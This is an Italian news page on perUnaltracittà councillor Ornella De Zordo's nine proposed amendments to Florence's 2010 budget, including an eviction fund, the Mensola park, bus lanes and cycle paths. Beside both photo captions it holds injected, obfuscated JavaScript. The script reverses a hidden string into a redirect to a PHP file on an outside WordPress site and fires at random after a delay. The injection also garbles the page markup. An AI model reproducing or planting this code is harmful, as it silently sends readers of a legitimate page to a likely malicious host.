15 dicembre 2018

De Zordo: "Due milioni per il parco del Mensola". Ecco le proposte di perUnaltracittà per il bilancio comunale

image_pdfimage_print

La consigliera di “perUnaltracittà” chiede anche di istituire un fondo per gli sfrattati per morosità e un altro per la raccolta porta a porta dei rifiuti

di Massimo Vanni

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2009/06/ornella-de-zordo.jpg”>Ornella De Zordo,    consigliera comunale di Per Unaltracittà
Ornella De Zordo, consigliera comunale di Per Unaltracittà

Un fondo di 200mila euro per gli sfratti per morosità. E quasi 2 milioni di euro per progettare e realizzare finalmente il parco del Mensola, rimasto sulla carta dopo essere stato cancellato dalle opere del «project» dei parcheggi. Sono le proposte che avanza Ornella De Zordo di «perUnaltracittà» per il bilancio di previsione 2010 che Palazzo Vecchio si appresta ad approvare la prossima settimana.

De Zordo propone poi di prelevare 400mila euro dalle spese di rappresentanza del Comune per destinarli al fondo canoni di locazione. Mentre altri 200mila euro, sostiene, potrebbero essere prelevati dai quasi 7 milioni di servizi Sas per incrementare la raccolta porta a porta dei rifiuti.

Quanto agli investimenti, De Zordo suggerisce di destinare alla realizzazione di nuove busvie per il trasporto pubblico almeno 430mila euro «eliminando una spesa “non prioritaria” come la copertura della tribuna dell´impianto sportivo Romagnoli». Secondo la consigliera di «perUnaltracittà» si potrebbero triplicare i finanziamenti per il piano delle alberature arrivando a 450mila euro attingendo dagli interventi previsti per il nuovo accesso museale di Palazzo Vecchio. Altri 470mila euro potrebbero essere investiti nelle piste ciclabili dimezzando i fondi per sistemare l´area pedonalizzata del Duomo.

Il bilancio è stato approvato ieri nella commissione urbanistica guidata da Titta Meucci. La maggioranza ha votato compatta, De Zordo si è detta contraria. Mentre Valdo Spini e Tommasi Grassi della Lista Spini hanno preferito astenersi dalla votazione.

Fonte Repubblica

***

Il comunicato di perUnaltracittà con le proposte integrali

Bilancio: le 9 proposte da 4 milioni e mezzo per una città migliore presentate da perUnaltracittà
Dall’aumento di risorse per i fondi su sfratti, canoni di locazione e sociale fino a nuove alberature, piste ciclabili, busvie e raccolta rifiuti porta a porta.

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/03/mensola.jpg”>Ponte a Mensola
Ponte a Mensola

«Non ci interessa la quantità ma la qualità. Per questo presentiamo “soltanto” 9 emendamenti che però propongono incrementi e spostamenti significativi di risorse, con l’obiettivo di dare fiato e gambe ad un’altra idea di “sviluppo” per la nostra città». Ornella De Zordo anticipa così le proposte che il gruppo perUnaltracittà presenterà al Consiglio comunale di lunedì prossimo, quando sarà discusso il bilancio di previsione 2010. «Abbiamo lavorato sulle priorità e sulle certezze delle spese (evitando volutamente di attingere a cifre provenienti da alienazioni), recuperando quasi 3 milioni di euro da destinare a fondi per la casa, per il verde, per il sociale, per la raccolta rifiuti porta a porta, per le piste ciclabili e per le corsie preferenziali per i mezzi pubblici. Proponiamo anche un investimento nuovo di un milione e 300milaeuro per il Parco del Mensola, già deliberato nella scorsa legislatura ma rimasto sulla carta».

In tutto nove emendamenti, 4 sulla spesa corrente e 5 sugli investimenti e lavori pubblici. Nel dettaglio le proposte di perUnaltracittà riguardano:

per la spesa corrente

1. un fondo speciale per sfratti per morosità di 200.000 euro, prelevati dai quasi 7 milioni sulla viabilità relativi ai servizi;

2. l’integrazione del fondo canoni di locazione, pari a 400.000 euro che derivano dalla riduzione delle spese di rappresentanza degli organi istituzionali del Comune;

3. un fondo per l’incremento della raccolta “porta a porta” dei rifiuti: 200.000 euro, recuperati dai quasi 7 milioni per i servizi Sas;

4. l’integrazione del fondo sociale regionale per 200.000 euro, recuperati dagli oltre 10,6 milioni per la Silfi, riducendo i consumi di illuminazione tramite risparmio energetico;

per investimenti e lavori pubblici

5. la realizzazione di busvie-corsie preferenziali per mezzi pubblici per un investimento di 430.000 euro, ricavati eliminando una spesa “non prioritaria”, la copertura della tribuna dell’impianto sportivo Romagnoli;

6. il triplicamento del finanziamento per il piano delle alberature, con la riqualificazione e reimpianto di nuovi alberi per 450.000 euro (erano solo 150 mila euro); per questo abbiamo attinto dagli interventi previsti per il nuovo accesso museale per la Sala d’Arme di Palazzo Vecchio

7. la realizzazione e manutenzione straordinaria delle piste ciclabili aumentando le risorse fino a 470.000 euro: per questo si utilizza la metà dei fondi previsti per sistemare l’area pedonalizzata del Duomo e delle strade vicine, che ammontano a ben 800.000 euro, e le risorse previste per il parcheggio per gli uffici comunali di Villa di Rusciano che risulta peraltro tra i beni da alienare

8. progettazione e realizzazione del Parco del Torrente Mensola, con un primo investimento di 600.000 euro, a scapito della ristrutturazione degli spogliatoi del campo di calcio di Peretola, spesa ritenuta “non prioritaria”;

9. sempre per il Parco del Mensola, nuovo investimento per il 2012 con 1 milione e 300mila euro, riducendo di circa un settimo i lavori stradali nel quartiere 1, a cui rimangono comunque oltre 6 milioni di euro.

0 Comments

  1. Pingback: Bilancio comunale approvato tra fenomeni paranormali: il Pd boccia se stesso | Notizie Firenze

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *